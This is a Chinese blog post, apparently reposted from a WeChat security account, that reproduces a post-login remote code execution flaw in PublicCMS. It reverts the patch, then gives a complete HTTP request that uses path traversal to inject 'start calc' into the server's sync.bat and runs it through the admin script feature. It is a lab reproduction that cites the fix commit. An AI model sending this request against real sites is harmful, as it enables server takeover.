CTF导航 CTF导航

JAVA PublicCMS后台RCE漏洞复现

渗透技巧 1年前 (2023) admin
71 0 0

复现大佬审计的javaCMS漏洞

环境下载

https://github.com/sanluan/PublicCMS

最新版本的漏洞修复了,将CmsFileUtils文件中的代码,修改为漏洞修复前代码

publiccms-parent/publiccms-core/src/main/java/com/publiccms/common/tools/CmsFileUtils.java

File file = Paths.get(dirPath, result.getPath()).toFile(); //修复前
//File file = Paths.get(dirPath, CmsFileUtils.getSafeFileName(result.getPath())).toFile();  //修复后

JAVA PublicCMS后台RCE漏洞复现

环境搭建

jdk1.8
idea2020
mysql

下载代码后,将代码用idea载入即可,要手动载入junit包

JAVA PublicCMS后台RCE漏洞复现

JAVA PublicCMS后台RCE漏洞复现

working directory配置项

设置到publiccms-parentpubliccms

JAVA PublicCMS后台RCE漏洞复现

配置后环境后,直接启动,然后进行安装程序

JAVA PublicCMS后台RCE漏洞复现

登录后台

JAVA PublicCMS后台RCE漏洞复现

漏洞复现

有一个执行脚本的功能点,脚本可选择bat或sh(用于Windows和Linux两个操作系统上)

JAVA PublicCMS后台RCE漏洞复现


构造数据包修改脚本文件内容

POST /admin/cmsTemplate/replace?navTabId=cmsTemplate/list HTTP/1.1
Host: 127.0.0.1:8080
sec-ch-ua-mobile: ?0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
sec-ch-ua-platform: "Windows"
Cookie: JSESSIONID=95329D5E39F69B69F0A291CC119EE56F; PUBLICCMS_ADMIN=1_2b46f00d-3f68-4479-a831-35be6a8fd772
Origin: http://127.0.0.1:8080
Accept-Encoding: gzip, deflate, br
Sec-Fetch-Site: same-origin
Referer: http://127.0.0.1:8080/admin/
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
sec-ch-ua: "Chromium";v="118", "Google Chrome";v="118", "Not=A?Brand";v="99"
X-Requested-With: XMLHttpRequest
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 72

_csrf=2b46f00d-3f68-4479-a831-35be6a8fd772&word=echo "repo not config!"&replace=echo "repo not config!" & start calc&replaceList[0].path=../../script/sync.bat&replaceList[0].indexs=0

将 sync.bat 文件中写入 start calc

JAVA PublicCMS后台RCE漏洞复现

接着在执行脚本的功能点,执行文件

JAVA PublicCMS后台RCE漏洞复现

漏洞利用成功

JAVA PublicCMS后台RCE漏洞复现

漏洞分析文章

https://forum.butian.net/share/2490
https://github.com/sanluan/PublicCMS/commit/c878442ec4dc77203c780c8a39bb5e7af47cf73b



原文始发于微信公众号(安全逐梦人):JAVA PublicCMS后台RCE漏洞复现

版权声明:admin 发表于 2023年10月30日 下午9:10。
转载请注明:JAVA PublicCMS后台RCE漏洞复现 | CTF导航

相关文章

针对Python 3.9修改pycdc源码示例
admin
813
云上天然cs远控
admin
412
CVE-2022-44877 Control Web Panel login 未授权远程命令执行漏洞复现
admin
1,782
每日安全动态推送(12-8)
admin
429
某站群命令执行之官方审核
admin
411
内网渗透 | 域渗透之Dcsync的利用实战
admin
1,132

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...

相关文章

Boolean-based SQL Injection in ZoneMinder v1.37.* <= 1.37.64
0
Open-Source Intelligence Summit 2024议题慢递
0
NTLM Relaying – Making the Old New Again
0
每日安全动态推送(24/11/4)
0
wuzhicms<=4.1.0后台RCE(0day)
0
每周蓝军技术推送(2024.10.26-11.1)
0
Apache Solr漏洞CVE-2024-45216分析
0
某小型cms漏洞复现审计
0
Distributed RPC Framework RemoteModule has Deserialization RCE in pytorch/pytorch(CVE-2024-48063)
0
JWT(JSON Web Token) 攻击面小结
0